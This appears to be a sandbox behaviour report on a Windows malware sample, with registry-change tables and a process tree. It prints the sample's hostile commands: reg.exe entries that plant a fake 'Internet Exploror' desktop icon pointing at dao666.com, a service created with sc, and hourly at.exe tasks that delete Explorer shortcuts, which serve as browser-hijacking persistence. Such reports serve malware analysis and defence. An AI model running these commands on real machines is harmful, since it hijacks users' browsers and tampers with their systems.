| Set value (data) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000042e7dba96731da408b68fe0ed5b0a24600000000020000000000106600000001000020000000cdc5e30ec34453dfe2f71e4db26d36862f42443e4574300401b933afb0f58b6d000000000e80000000020000200000003c157ab80ca515e0fbaa9eb85987b1a4563fe7115a87aa3ac92435ce2a42655220000000d8d59c26ac9d7b97ada194bcc6aa8e25018821a91705eae155876ba21f289dd34000000008d9f57eb0c001c2ca9f6f356d4b338f01e53976c51da92278805b2b611cb72b8aed609d5c508fb978086394f2e76f1290586e35421579179b12703755ac2830 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Internet Explorer\VersionManager | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 90b9d533ca2ddb01 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "862310467" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InfoTip = "▓Θ╒╥▓ó╧╘╩╛ Internet ╔╧╡─╨┼╧ó║══°╒╛" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\LocalizedString = "Internet Exploror" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32 | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)\Command\ | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder\ | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder\HideOnDesktopPerUser | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849} | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\DefaultIcon\ = "shdoclc.dll,0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)\Command | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder\HideFolderVerbs | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\DefaultIcon | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\DefaultIcon | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32\ | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32\ThreadingModel = "Apartment" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\Command\ | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)\ | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\8a85523d1bf50ddd4544c874c2cfed4f_JaffaCakes118.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\ | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\ = "┤≥┐¬╓≈╥│(&H)" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\ | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H) | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\MUIVerb = "@shdoclc.dll,-10241" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\Command | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\DefaultIcon\ | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H) | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)\Command\ = "C:\\progra~1\\Intern~1\\iexplore.exe http://dao666.com/?ha" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder\WantsParsDisplayName | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849} | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\Command | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R) | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder\Attributes = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849} | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32 | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32\ = "%systemRoot%\\SysWow64\\shdocvw.dll" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)\Command | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32 | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\Command\ = "C:\\progra~1\\Intern~1\\iexplore.exe http://dao666.com/?ha" | C:\Windows\SysWOW64\reg.exe | N/A |
Runs net.exe
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\8a85523d1bf50ddd4544c874c2cfed4f_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\8a85523d1bf50ddd4544c874c2cfed4f_JaffaCakes118.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\121xia.vbs"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C start /min iexplore http://447.cc/index2.html?121xia
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" http://447.cc/index2.html?121xia
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C .\to.cmd
C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel" /v "{871C5380-42A0-1069-A2EA-08002B30309D}" /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4912 CREDAT:17410 /prefetch:2
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}" /v "InfoTip" /t REG_SZ /d "▓Θ╒╥▓ó╧╘╩╛ Internet ╔╧╡─╨┼╧ó║══°╒╛" /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}" /v "LocalizedString" /t REG_SZ /d "Internet Exploror" /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\DefaultIcon"
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\DefaultIcon" /ve /t REG_EXPAND_SZ /d "shdoclc.dll,0" /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32"
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32" /ve /t REG_SZ /d "%systemRoot%\system32\shdocvw.dll" /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32" /v "ThreadingModel" /t REG_SZ /d "Apartment" /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell"
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell" /ve /t REG_SZ /d "┤≥┐¬╓≈╥│(&H)" /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)"
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)" /v "MUIVerb" /t REG_SZ /d "@shdoclc.dll,-10241" /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\Command"
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\Command" /ve /t REG_SZ /d "C:\progra~1\Intern~1\iexplore.exe http://dao666.com/?ha" /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)"
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)\Command"
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)\Command" /ve /t REG_SZ /d "C:\progra~1\Intern~1\iexplore.exe http://dao666.com/?ha" /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder"
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder" /v "Attributes" /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder" /v "HideFolderVerbs" /t REG_SZ /d "" /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder" /v "HideOnDesktopPerUser" /t REG_SZ /d "" /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder" /v "WantsParsDisplayName" /t REG_SZ /d "" /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoInternetIcon" /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C .\copy.cmd
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C .\run.cmd
C:\Windows\SysWOW64\sc.exe
sc create Schedule binpath= "C:\Windows\svchost.exe -k netsvcs" depend= rpcss start= auto displayname= "Task Scheduler"
C:\Windows\SysWOW64\sc.exe
sc config Schedule start= auto
C:\Windows\SysWOW64\net.exe
net start "Task Scheduler"
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start "Task Scheduler"
C:\Windows\SysWOW64\at.exe
at 8:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
C:\Windows\SysWOW64\at.exe
at 8:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 8:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 9:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
C:\Windows\SysWOW64\at.exe
at 9:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 9:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 10:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
C:\Windows\SysWOW64\at.exe
at 10:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 10:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 11:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
C:\Windows\SysWOW64\at.exe
at 11:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 11:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 12:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
C:\Windows\SysWOW64\at.exe
at 12:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 12:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 13:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
C:\Windows\SysWOW64\at.exe
at 13:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 13:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 14:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
C:\Windows\SysWOW64\at.exe
at 14:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 14:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 15:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
C:\Windows\SysWOW64\at.exe
at 15:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 15:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 16:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
C:\Windows\SysWOW64\at.exe
at 16:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 16:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 17:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
C:\Windows\SysWOW64\at.exe
at 17:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 17:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 18:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
C:\Windows\SysWOW64\at.exe
at 18:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 18:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 19:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
C:\Windows\SysWOW64\at.exe
at 19:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 19:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
